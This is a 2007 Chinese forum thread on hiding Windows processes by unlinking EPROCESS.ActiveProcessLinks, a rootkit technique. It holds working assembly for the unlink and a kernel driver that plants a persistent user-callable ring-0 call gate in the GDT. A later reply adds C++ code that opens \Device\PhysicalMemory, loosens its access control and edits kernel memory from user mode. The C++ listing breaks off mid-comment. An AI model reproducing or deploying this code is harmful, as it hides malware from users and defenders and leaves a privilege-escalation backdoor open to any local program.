俺也来讲讲课,献献丑吧!
很多帖子都写过如何修改活动进程链(EPROCESS.ActiveProcessLinks)来隐藏进程,但大多不说明原因,让别人知其然不知其所以然,今天俺来发个帖子献献丑。
大家可能使用过PsGetCurrentProcess函数来获取当前线程所属进程的EPROCESS,如果你反汇编这个函数的话,你一定会发现这可能是内核中最简单的一个函数了,只有三行: mov eax, fs:0x00000124; mov eax, [eax + 0x44]; ret 这么简单的代码也行?当然可以!x86 内核态下 fs 指向当前 CPU 的 KPCR(Processor Control Region),里面嵌着一个叫 Kernel's Processor Control Block(KPRCB,核心处理控制块)的好东东;单处理器 XP 上 CPU 0 的 KPCR 固定在 0xffdff000,KPRCB 在 0xffdff120,所以 fs:[0x124] 就是 0xffdff124:这个双字指向当前线程的ETHREAD块,再下一个双字(0xffdff128)指向下一个将要被调度的线程的ETHREAD块,简单吧。注意多处理器机器上每个 CPU 有自己的 KPCR,所以要对所有 CPU 都成立就得像 PsGetCurrentProcess 一样用 fs:[124h];下面例子里写死的 0ffdff124h 只在 CPU 0 上是对的。ETHREAD块的数据结构相对复杂,不过你只需要知道它(XP 上)offset 0x44处为所属进程 EPROCESS块的地址就可以了,这就是三行代码就可以得到当前线程的EPROCESS地址的原因!EPROCESS块中有个有趣的数据结构叫活动进程链(ActiveProcessLinks),它是一个 LIST_ENTRY,只有两个双字,一个FlINK,一个BLINK:FLINK指向下一个进程的 LIST_ENTRY(也就是它的 FLINK 字段),BLINK 指向上一个进程的 LIST_ENTRY(同样是它的 FLINK 字段,而不是 BLINK 字段——所以下面脱链时是往 [edi] 写 esi、往 [esi+4] 写 edi),要想隐藏进程的话,只需要把自己脱链就可以了,呵呵! mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址 mov eax,[eax+44h] ;EPROCESS地址 mov ecx,088h ;XP中活动进程链地址,NT下为0x98,2000下为0xA0,自己看着办吧! mov esi,dword ptr[eax+ecx] ;XP中FLINK mov edi,dword ptr[eax+ecx+4] ;BLINK mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK mov dword ptr[edi],esi ;FLINK放到前一个FLINK 两点提醒:上面所有偏移(0x44、0x88/0x98/0xA0)都和内核版本绑定,换系统前先用 WinDbg 的 dt nt!_ETHREAD / dt nt!_EPROCESS 核对,偏移错了就是蓝屏(见 10 楼);另外脱链只是从 ActiveProcessLinks 这一条链上消失,EPROCESS 本身还在,靠其他途径(比如句柄表、线程链)枚举进程的工具照样能看到它,IceSword 之类的检测工具做的就是这种交叉比对。 以下是一个例子! .386p .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include macros.asm include masm32.inc include debug.inc include advapi32.inc includelib debug.lib includelib masm32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib advapi32.lib .data dwFileSize dd 0 hFile dd 0 hMemory dd 0 pMemory dd 0 FunBase dd 0b6a8h tmp db 50 dup(90) Callgt dd 0 dw 353h .data? hInstance HINSTANCE ? CommandLine LPSTR ? 
.code

;----------------------------------------------------------------------
; WinMain - registers the "HIDE" window class, creates one overlapped
; window and runs a plain GetMessage/DispatchMessage loop.  Returns
; msg.wParam (the PostQuitMessage exit code).  hPrevInst, CmdLine and
; CmdShow are not used.  Return values of RegisterClassEx/CreateWindowEx
; are not checked.
;----------------------------------------------------------------------
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
    LOCAL wc:WNDCLASSEX
    LOCAL msg:MSG
    LOCAL hwnd:HWND

    mov wc.cbSize,SIZEOF WNDCLASSEX
    mov wc.style, CS_HREDRAW or CS_VREDRAW
    mov wc.lpfnWndProc, OFFSET WndProc
    mov wc.cbClsExtra,NULL
    mov wc.cbWndExtra,NULL
    push hInst
    pop wc.hInstance
    mov wc.hbrBackground,COLOR_WINDOW+1
    mov wc.lpszMenuName,NULL
    mov wc.lpszClassName,CTXT("HIDE")
    invoke LoadIcon,NULL,IDI_APPLICATION
    mov wc.hIcon,eax
    mov wc.hIconSm,0
    invoke LoadCursor,NULL,IDC_ARROW
    mov wc.hCursor,eax
    invoke RegisterClassEx, addr wc
    INVOKE CreateWindowEx,NULL,CTXT("HIDE"),CTXT("HIDE"),\
           WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,\
           CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,\
           hInst,NULL
    mov hwnd,eax
    INVOKE ShowWindow, hwnd,SW_SHOWNORMAL
    INVOKE UpdateWindow, hwnd
    .WHILE TRUE
        INVOKE GetMessage, ADDR msg,NULL,0,0
        ; leaves the loop only on 0 (WM_QUIT); a -1 error return is non-zero
        ; and would keep spinning
        .BREAK .IF (!eax)
        INVOKE TranslateMessage, ADDR msg
        INVOKE DispatchMessage, ADDR msg
    .ENDW
    mov eax,msg.wParam
    ret
WinMain endp

;----------------------------------------------------------------------
; WndProc - window procedure.  WM_CLOSE destroys the window and posts
; WM_QUIT; WM_PAINT draws the taunt string centred in the client area;
; everything else goes to DefWindowProc (whose result is returned as-is).
;----------------------------------------------------------------------
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    LOCAL hdc:HDC
    LOCAL ps:PAINTSTRUCT
    LOCAL rect:RECT

    .IF uMsg==WM_CLOSE
        invoke DestroyWindow,hWnd
        invoke PostQuitMessage,NULL
    .ELSEIF uMsg==WM_PAINT
        invoke BeginPaint,hWnd, ADDR ps
        mov hdc,eax
        invoke GetClientRect,hWnd, ADDR rect
        invoke DrawText, hdc,CTXT("不用ICESWORD,你能看见俺吗?"),-1, ADDR rect, DT_SINGLELINE or DT_CENTER or DT_VCENTER
        invoke EndPaint,hWnd, ADDR ps
    .ELSE
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        ret
    .ENDIF
    xor eax,eax
    ret
WndProc endp

;----------------------------------------------------------------------
; _OpenSys - registers sys.sys (from the current directory) as a
; demand-start kernel driver named "sys", starts it once, and removes the
; service again.  DriverEntry (reply #6) installs the call gate and then
; deliberately returns STATUS_DEVICE_CONFIGURATION_ERROR, so StartService
; "fails" and the image is unloaded at once -- the GDT change stays.
; Failures are reported with MessageBox; StartService's result is ignored.
; Note: a leftover "sys" service from an aborted earlier run makes
; CreateService fail (ERROR_SERVICE_EXISTS) and this routine gives up.
;----------------------------------------------------------------------
_OpenSys proc
    local hSCManager:HANDLE
    local hService:HANDLE
    local acDriverPath[MAX_PATH]:CHAR

    ; Open a handle to the SC Manager database
    invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
    .if eax != NULL
        mov hSCManager, eax
        ; The pushed dword is used as GetFullPathName's lpFilePart out-slot:
        ; invoke pushes right-to-left, so "esp" is evaluated before the
        ; other arguments are pushed and points at this slot.
        push eax
        invoke GetFullPathName, CTXT("sys.sys",0), sizeof acDriverPath, addr acDriverPath, esp
        pop eax
        ; Register driver in SCM active database
        invoke CreateService, hSCManager, CTXT("sys",0), CTXT("System",0), \
               SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
               SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
        .if eax != NULL
            mov hService, eax
            invoke StartService, hService, 0, NULL
            ; DriverEntry writes the call gate into the GDT and reports an
            ; error so the driver is removed from memory immediately.
            ; (The original comment here still talked about the masm32
            ; "beeper.sys" sample this code was adapted from.)
            ; Remove driver from SCM database
            invoke DeleteService, hService
            invoke CloseServiceHandle, hService
        .else
            invoke MessageBox, NULL, CTXT("Can't register driver.",0), NULL, MB_ICONSTOP
        .endif
        invoke CloseServiceHandle, hSCManager
    .else
        invoke MessageBox, NULL, CTXT("Can't connect to Service Control Manager.",0), \
               NULL, MB_ICONSTOP
    .endif
    ret
_OpenSys endp

;----------------------------------------------------------------------
; Entry point.
;  1. _OpenSys loads sys.sys once; DriverEntry (reply #6) leaves a DPL-3
;     32-bit call gate at GDT selector 350h (called here as 353h, RPL 3)
;     whose target is a single RET byte written into the GDT's null
;     descriptor, executed with the flat ring-0 code segment 358h.
;  2. "call fword ptr [Callgt]" goes through that gate.  The RET on the
;     far side is a *near* return: it pops only the saved user EIP, so
;     execution resumes at the next instruction below -- still CPL 0 and
;     still on the ring-0 stack, where [esp] now holds the saved user CS
;     and [esp+4] the saved user ESP.
;  3. The ActiveProcessLinks unlink from the article runs with XP offsets
;     hard-coded: 0ffdff124h (KPRCB.CurrentThread of CPU 0), ETHREAD+44h
;     (owning EPROCESS), EPROCESS+88h (ActiveProcessLinks).  Other kernels
;     use other offsets -- reply #10 reports a BSOD on 2000/2003 -- check
;     with "dt nt!_ETHREAD" / "dt nt!_EPROCESS" before touching them.
;  4. "push offset Exit / retf" pops EIP=Exit and the saved user CS; since
;     the privilege level changes it also pops the saved user ESP/SS, so
;     we are back in ring 3 at Exit.
; Points a reviewer would flag:
;  - The gate is never removed.  After this program has run once, any
;    user-mode code on the machine can go through selector 353h exactly
;    as this code does and run at ring 0.
;  - 0ffdff124h is the KPCR/KPRCB of processor 0 only; on an MP system
;    the fs:[124h] form from the article is the correct one.
;  - The unlink runs at ring 0 on the *user* stack with interrupts still
;    enabled (no cli); the kernel does not expect that state.
;  - After unlinking, this EPROCESS's own Flink/Blink still point at its
;    former neighbours; nothing here fixes them up.
;----------------------------------------------------------------------
start:
    invoke _OpenSys
    call fword ptr [Callgt]             ; use callgate to Ring0!
    mov eax,esp                         ; save ring0 esp
    mov esp,[esp+4]                     ; ->ring3 esp
    push eax
    pushfd
    pushad
    mov eax,dword ptr ds:[0ffdff124h]   ; ETHREAD address (KPRCB.CurrentThread; CPU 0 only)
    mov eax,[eax+44h]                   ; EPROCESS address (XP offset)
    mov ecx,088h                        ; ActiveProcessLinks offset: XP 0x88 (2000: 0xA0, NT4: 0x98)
    mov esi,dword ptr[eax+ecx]          ; FLINK on XP
    mov edi,dword ptr[eax+ecx+4]        ; BLINK
    mov dword ptr[esi+4],edi            ; next->Blink = our Blink
    mov dword ptr[edi],esi              ; prev->Flink = our Flink
    popad
    popfd
    pop esp                             ; restore ring0 esp
    push offset Exit
    retf                                ; far return -> ring 3 at Exit
Exit:
    invoke _OpenSys                     ; second load: the gate is already present, so
                                        ; DriverEntry only returns its error (purpose unclear)
    invoke Sleep,2                      ; (the original had an empty ";" comment here)
    invoke GetModuleHandle, NULL
    mov hInstance,eax
    invoke GetCommandLine               ; NOTE: result is never stored -- CommandLine stays uninitialised
    invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
    invoke ExitProcess,NULL
end start
沙发#
发布于:2007-04-06 11:38
不错:) 赞一个
如果能用c改一下,估计更方便阅读和理解了:) |
板凳#
发布于:2007-04-06 11:56
写的挺好。不错不错。收藏。
地板#
发布于:2007-04-06 12:59
很实用...
地下室#
发布于:2007-04-07 14:22
sys.sys里做了什么呢?有代码看看吗?
5楼#
发布于:2007-04-08 10:21
与 FU rootkit 的技术一样:都是 DKOM(直接改内核对象),把自己的 EPROCESS 从 ActiveProcessLinks 链上摘掉,而不是挂钩 API。
6楼#
发布于:2007-04-08 11:24
引用第4楼tiaozi2000于2007-04-07 14:22发表的“”: sys.sys只是负责生成一个调用门,代码如下:
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
; CallGate - Kernel Mode Driver
;
; Written by zjjmj2002 (zjjmj2002@tom.com)
;
; Installs a user-callable (DPL 3) 32-bit call gate at GDT offset 350h and a
; flat ring-0 code segment at 358h, then returns an error so the SCM unloads
; the image straight away.  The descriptors are written directly into the
; GDT and are never removed, so they outlive both the driver and the process
; that loaded it: from then on any user-mode code can enter ring 0 through
; selector 353h.
;
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.386
.model flat, stdcall
option casemap:none

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E   F I L E S
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry - pDriverObject / pusRegistryPath are unused.
; Always returns STATUS_DEVICE_CONFIGURATION_ERROR (see bottom).
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    pushfd
    pushad
    ; SGDT stores 6 bytes: the limit word at [esp-2] and the 32-bit base at
    ; [esp..esp+3].  The pushed edx slot is overwritten with the base, which
    ; is then popped back into edx.  The limit is not used.
    push edx
    sgdt [esp-2]
    pop edx
    mov eax,edx                                 ; eax = edx = GDT linear base
    mov ecx,350h                                ; descriptor slot: selector 350h (used as 353h = RPL 3)
    .if dword ptr [edx+ecx+2]!=0ec000358h      ; skip if already installed (idempotent on re-load)
        ; Gate target: one RET (0C3h) placed in byte 0 of the null descriptor,
        ; i.e. at the GDT base itself; the CPU never reads the null descriptor.
        mov byte ptr [edx],0c3h
        ; Call-gate descriptor (IA-32 layout): bytes 0-1 = offset 15:0
        mov word ptr [edx+ecx],ax
        shr eax,16
        mov word ptr [edx+ecx+6],ax             ; bytes 6-7 = offset 31:16
        ; bytes 2-5: selector 0358h, param count 0, access 0ECh
        ; (P=1, DPL=3, type 0Ch = 32-bit call gate)
        mov dword ptr [edx+ecx+2],0ec000358h
        ; Code segment at 358h: base 0, limit 0FFFFFh with G=1 (4 GiB flat),
        ; access 09Ah = present, DPL 0, code, exec/read; flags 0Ch = 32-bit, 4K granularity
        mov dword ptr [edx+ecx+8],0000ffffh
        mov dword ptr [edx+ecx+12],00cf9a00h
    .endif
    popad
    popfd
    ; Deliberate failure: the SCM unloads the driver immediately; the GDT
    ; edits above persist until reboot.
    mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
    ret
DriverEntry endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
end DriverEntry
7楼#
发布于:2007-04-08 17:00
...无语~全是汇编~
8楼#
发布于:2007-04-08 18:22
这种精神值得提倡,共同学习提高技术!
9楼#
发布于:2007-04-08 20:33
引用第7楼killvxk于2007-04-08 17:00发表的“”: 嘿嘿,俺职业又不是程序员,编程只是业余爱好,当然是什么顺手用什么乐。 |
10楼#
发布于:2007-04-12 14:45
很感谢LZ,又学到一手。。。
测试程序在WIN2K和WIN2K3上,蓝屏,死机。。。。 WINXP SP2正常,为什么呢? |
11楼#
发布于:2007-04-12 18:44
LS没仔细看LZ的文章:例子里 `mov ecx,088h` 和 `[eax+44h]` 都是按 XP 写死的偏移,正文已经说了 2000 下活动进程链的偏移是 0xA0(NT 是 0x98),2003 的 ETHREAD/EPROCESS 布局也不一定和 XP 一样;拿 XP 的偏移去改别的内核的链表,写错地方自然蓝屏。换系统前先用 WinDbg 的 `dt nt!_ETHREAD` / `dt nt!_EPROCESS` 把偏移核对一遍。
12楼#
发布于:2007-04-14 23:28
恩,很好,赞一个:)
13楼#
发布于:2007-04-15 08:48
写的非常好,赞一个.
14楼#
发布于:2007-04-18 17:57
---------- nmake ----------
Microsoft (R) Program Maintenance Utility Version 6.00.8168.0 Copyright (C) Microsoft Corp 1988-1998. All rights reserved. ml /c /coff hide.asm Microsoft (R) Macro Assembler Version 6.15.8803 Copyright (C) Microsoft Corp 1981-2000. All rights reserved. Assembling: hide.asm hide.asm(110) : error A2136: too many arguments to INVOKE hide.asm(110) : error A2208: missing left parenthesis in expression hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(110) : error A2084: constant value too large hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 1 hide.asm(114) : error A2136: too many arguments to INVOKE hide.asm(114) : error A2208: missing left parenthesis in expression hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 5 hide.asm(114) : error A2084: constant value too large hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 4 hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(114) : error A2207: missing right parenthesis in expression hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(126) : error A2136: too many arguments to INVOKE hide.asm(126) : error A2208: missing left parenthesis in expression hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(126) : error A2084: constant value too large hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(130) : error A2136: too many arguments to INVOKE hide.asm(130) : error A2208: missing left parenthesis in expression hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(130) : error A2084: constant value too large hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 2 NMAKE : fatal error U1077: 'ml' : return code '0x1' Stop. Normal Termination |
15楼#
发布于:2007-04-26 15:55
引用第14楼cppdev于2007-04-18 17:57发表的“”: ---------------------------------------------- 这种错误还是自己搞定,不是人家代码的问题, 楼主没义务,帮你做这么简单而繁琐的事情。提示一下:报错的 110/114/126/130 四行正好都是用了 CTXT("...",0) 的 invoke,而前面 CTXT("HIDE") 的几处没报错——看起来是你那个版本 macros.asm 里的 CTXT 宏只收一个参数,多出来的 ",0" 被当成了 invoke 的额外实参(所以才会报 A2136 "too many arguments" 和 A2208);把 ",0" 去掉(CTXT 本身就会补 0 结尾)或换成 VARARG 版本的宏应该就能过。 |
16楼#
发布于:2007-04-27 12:00
汇编,看不懂...
17楼#
发布于:2007-04-27 18:25
好吧,我把我的应用层实现贴出来:)
// HideProcess.cpp: implementation of the CHideProcess class.
// Process-hiding program (user-mode DKOM).
// Call the hide entry points (HideCurrent() / HideByID()) when hiding is wanted.
//
// Mechanism, as implemented below:
//   1. GetEprocessFromPid()  opens a handle to the target PID and looks that
//      handle up in the system handle table (ZwQuerySystemInformation with
//      SystemHandleInformation); the entry's Object field is the EPROCESS.
//   2. OpenPhysicalMemory()  opens \Device\PhysicalMemory read/write (widening
//      its DACL for the current user if the first open is denied) and maps the
//      4 KiB page at a hard-coded physical address that this code takes to be
//      the kernel page directory of the running OS version.
//   3. LinearToPhys() / GetData() / SetData()  walk the page tables by hand
//      (32-bit entries, 10-bit PDE index => non-PAE, two-level) so a kernel
//      virtual address can be read or written through physical-memory views.
//   4. YHideProcess()  unlinks EPROCESS.ActiveProcessLinks (offset 0xa0 on
//      5.0, 0x88 on 5.1/5.2).
//
// Review notes (comments only; the code is left exactly as posted):
//   - Everything assumes a non-PAE kernel.  With PAE (typically XP SP2 on
//     NX-capable CPUs, Server 2003, or /PAE) page tables are three-level with
//     64-bit entries: LinearToPhys() reads the wrong data and SetData() then
//     writes to unrelated physical pages.
//   - User-mode opens of \Device\PhysicalMemory are refused from Windows
//     Server 2003 SP1 onward regardless of the DACL, so this is limited to
//     2000 / XP / 2003 RTM.
//   - The DACL widening on \Device\PhysicalMemory is never reverted; it
//     outlives this program.
//   - The forum rendered "[i]" as italics (see reply #18), so every
//     "h_info.Field" in GetEprocessFromPid() should read "h_info[i].Field".
//   - AfxMessageBox / TFileTrace / TRACE come from the poster's project
//     (MFC plus a private trace helper); they are not declared here.
//////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

// Declared for completeness; not used by the code below.
typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// OBJECT_ATTRIBUTES.Attributes flags (only 0 is actually passed below)
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
// One 16-byte entry per open handle (32-bit kernel).  The buffer returned by
// ZwQuerySystemInformation starts with a ULONG entry count, then the entries.
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;                 // kernel address of the object (EPROCESS for a process handle)
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );

// ntdll entry points, resolved at runtime by InitNTDLL()
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

HMODULE g_hNtDLL = NULL;               // ntdll.dll module handle
PVOID g_pMapPhysicalMemory = NULL;     // view of the page-directory page (see OpenPhysicalMemory)
HANDLE g_hMPM = NULL;                  // \Device\PhysicalMemory section handle
OSVERSIONINFO g_osvi;                  // filled in by OpenPhysicalMemory()

//---------------------------------------------------------------------------
BOOL CHideProcess::m_bInit = FALSE;
// Single static instance: its constructor runs InitNTDLL() during static
// initialisation and its destructor frees ntdll at exit.
CHideProcess CHideProcess::m_NoAction;

//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

// Loads ntdll and records the result in m_bInit.
CHideProcess::CHideProcess()
{
    m_bInit = InitNTDLL();
}

// Releases ntdll.
CHideProcess::~CHideProcess()
{
    CloseNTDLL();
}

// load dll and get functions
// Returns FALSE if ntdll.dll cannot be loaded or any of the three
// entry points is missing (g_hNtDLL is kept loaded in that case).
BOOL CHideProcess::InitNTDLL()
{
    // load dll
    if (NULL == g_hNtDLL)
    {
        g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
        if (NULL == g_hNtDLL)
        {
            return FALSE;
        }
    }
    // get functions
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
    ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
    if ((RtlInitUnicodeString == NULL) || (ZwOpenSection == NULL) || (ZwQuerySystemInformation == NULL))
    {
        return FALSE;
    }
    m_bInit = TRUE;
    return TRUE;
}

//---------------------------------------------------------------------------
// Frees ntdll.dll (the function pointers above are left dangling).
VOID CHideProcess::CloseNTDLL()
{
    if (NULL != g_hNtDLL)
    {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        m_bInit = FALSE;
    }
}

//---------------------------------------------------------------------------
// Grants the current user SECTION_MAP_WRITE on the \Device\PhysicalMemory
// section by appending one ACE to its DACL.  hSection must have been opened
// with READ_CONTROL|WRITE_DAC (see OpenPhysicalMemory()).
// NOTE(review): none of the three error branches returns, so after a failed
// GetSecurityInfo() or SetEntriesInAcl() the next call still runs -- and per
// the SetSecurityInfo docs a NULL pNewDacl with DACL_SECURITY_INFORMATION
// installs a NULL DACL (everyone, full access).  On success pSD and pNewDacl
// are never freed, and nothing ever restores the original DACL.
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pNewDacl = NULL;
    DWORD dwRes = GetSecurityInfo(
        hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
        NULL, NULL, &pDacl, NULL, &pSD
        );
    if(ERROR_SUCCESS != dwRes)
    {
        // NOTE(review): no return -- falls through with pDacl == NULL
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";      // well-known trustee name: the caller's own account
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);   // pNewDacl = pDacl + this ACE
    if(ERROR_SUCCESS != dwRes)
    {
        // NOTE(review): no return -- SetSecurityInfo below still runs
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    dwRes = SetSecurityInfo(
        hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
        NULL, NULL, pNewDacl, NULL
        );
    if(ERROR_SUCCESS != dwRes)
    {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    // NOTE(review): success path leaks pSD and pNewDacl.
}

//---------------------------------------------------------------------------
// Opens \Device\PhysicalMemory for read/write (widening its DACL once if the
// first open is denied) and maps the 4 KiB page at PhyDirectory -- the
// physical address this code assumes for the kernel page directory on each
// NT 5.x minor version -- into g_pMapPhysicalMemory.  Also fills g_osvi,
// which YHideProcess() reads later.
// Returns the section handle, or NULL on any failure / unsupported version.
// NOTE(review): the PhyDirectory constants and the page walk in
// LinearToPhys() only make sense on a non-PAE kernel.  The status of the
// READ_CONTROL|WRITE_DAC re-open is not checked before g_hMPM is used.
HANDLE CHideProcess::OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    if (5 != g_osvi.dwMajorVersion)
        return NULL;                                // NT 5.x only
    switch(g_osvi.dwMinorVersion)
    {
        case 0: PhyDirectory = 0x30000; break;      // 2k
        case 1: PhyDirectory = 0x39000; break;      // xp
        case 2: PhyDirectory = 0x39000; break;      // 2k03
        default:
            AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
            TFileTrace(_T("init PhysicalMemory: Unknown version...\n"));
            return NULL;
    }

    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    if(status == STATUS_ACCESS_DENIED)
    {
        // Write access was denied: re-open for READ_CONTROL|WRITE_DAC, add a
        // SECTION_MAP_WRITE ACE for the current user, then retry read/write.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    }
    if(!NT_SUCCESS(status))
    {
        AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
        TFileTrace(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
        return NULL;
    }
    TFileTrace(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
    g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
        g_hMPM,                         // handle
        FILE_MAP_READ|FILE_MAP_WRITE,
        0,                              // offset high part
        PhyDirectory,                   // offset low part
        0x1000                          // size
        );
    if( g_pMapPhysicalMemory == NULL )
    {
        AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
        TFileTrace(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
        return NULL;
    }
    return g_hMPM;
}

//---------------------------------------------------------------------------
// Translates a virtual address to a physical one with a manual 32-bit,
